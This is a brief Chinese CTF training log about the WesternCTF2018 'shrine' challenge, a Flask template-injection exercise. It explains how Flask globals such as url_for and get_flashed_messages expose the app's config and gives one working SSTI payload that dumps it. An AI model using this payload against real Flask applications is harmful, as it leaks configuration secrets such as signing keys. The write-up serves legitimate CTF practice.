[BUUCTF]第十三天训练日志

文章目录

[WesternCTF2018]shrine

考点:shrine模板注入
[BUUCTF]第十三天训练日志
知识点就是python中flask的一些内置函数,url_for和get_flashed_messages,通过这些python的内置函数,我们可以读取config的一些信息
/shrine/{{url_for.__globals__['current_app'].config}}